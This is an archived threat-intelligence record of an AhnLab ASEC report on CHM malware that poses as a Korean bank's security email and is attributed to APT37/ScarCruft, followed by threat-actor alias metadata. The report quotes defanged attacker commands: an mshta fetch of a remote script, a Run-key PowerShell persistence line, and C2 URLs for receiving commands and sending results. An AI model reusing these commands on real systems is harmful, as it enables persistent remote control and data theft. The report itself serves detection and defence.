{ "id": "72a95023-e23e-4b65-85a8-3f4592215408", "created_at": "2026-04-06T00:11:03.299288Z", "updated_at": "2026-04-10T13:12:48.621933Z", "deleted_at": null, "sha1_hash": "12f452cd87477784211c51ad3bb3fe992a661af4", "title": "CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1590181, "plain_text": "CHM Malware Disguised as Security Email from a Korean\r\nFinancial Company: Redeyes (Scarcruft) - ASEC\r\nBy ATCP\r\nPublished: 2023-03-02 · Archived: 2026-04-05 19:25:54 UTC\r\nASEC (AhnLab Security Emergency response Center) analysis team has discovered that the CHM malware,\r\nwhich is assumed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), is being\r\ndistributed to Korean users. The team has confirmed that the command used in the “2.3. Persistence” stage of the\r\nRedEyes group’s M2RAT malware attack, which was reported back in February, has the same format as the\r\ncommand used in this attack. This information, as well as the details of the CHM malware’s operation process, is\r\ndescribed in the following post. https://asec.ahnlab.com/en/48063/ When the CHM file is executed, it displays a\r\nHelp screen disguised as a security email from a Korean financial company. The malicious script that exists within\r\nthe CHM is activated during this process, making it difficult for users to notice. There has been a recent increase\r\nin malware distribution using CHM. \r\nhttps://asec.ahnlab.com/en/49089/\r\nPage 1 of 4\n\nThe malicious script that’s executed is shown below, and, like the other CHM malware introduced in the past, it\r\nalso uses a shortcut object (ShortCut). The shortcut object is called through the Click method, and the command\r\nunder the Item1 entry is executed. This file executes an additional script that exists within a certain URL through\r\nthe mshta process. \r\nExecuted Command mshta.exe hxxp://shacc[.]kr/skin/product/1.html\r\nThe “1.html” file executed through the mshta process contains a JS (JavaScript) code. This code is responsible for\r\nexecuting the encoded PowerShell commands. The PowerShell command executed here has a similar format as\r\nthe command used during the aforementioned M2RAT attack process. \r\nhttps://asec.ahnlab.com/en/49089/\r\nPage 2 of 4\n\nAn examination of the decoded PowerShell command revealed that everything aside from the C2 address, the file\r\nname under which the command execution results are saved, and the registry value, has the same code as the\r\ncommand used back in February. This command is responsible for registering the RUN key to establish\r\npersistence, receiving commands from the threat actor’s server, and transmitting the command execution results. \r\nRUN Key Registration Registry path: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue name: icxrNpVd Value: c:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -\r\nNoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta\r\nhxxp://shacc[.]kr/skin/product/1.html\r\nC2 hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer name]+[Username] // Receives threat actor’s\r\ncommands hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64-encoded] // Transmits the command\r\nexecution results\r\nWhen a system is infected with this type of malware, the system can suffer great damage since this malware is\r\ncapable of performing various malicious acts such as downloading files and extorting information according to the\r\nthreat actor’s commands. In particular, malware that targets specific users in Korea may include content on topics\r\nof interest to the user to encourage them to execute the malware, so users should refrain from opening emails from\r\nunknown sources and should not execute their attachments. Users should also regularly scan their PCs and update\r\ntheir security products to the latest engine. [File Detection] Trojan/CHM.Agent (2023.03.03.03) \r\nMD5\r\n8d2eebd10d90953cfada64575328ae24\r\nhttps://asec.ahnlab.com/en/49089/\r\nPage 3 of 4\n\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/49089/\r\nhttps://asec.ahnlab.com/en/49089/\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://asec.ahnlab.com/en/49089/" ], "report_names": [ "49089" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434263, "ts_updated_at": 1775826768, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/12f452cd87477784211c51ad3bb3fe992a661af4.pdf", "text": "https://archive.orkl.eu/12f452cd87477784211c51ad3bb3fe992a661af4.txt", "img": "https://archive.orkl.eu/12f452cd87477784211c51ad3bb3fe992a661af4.jpg" } }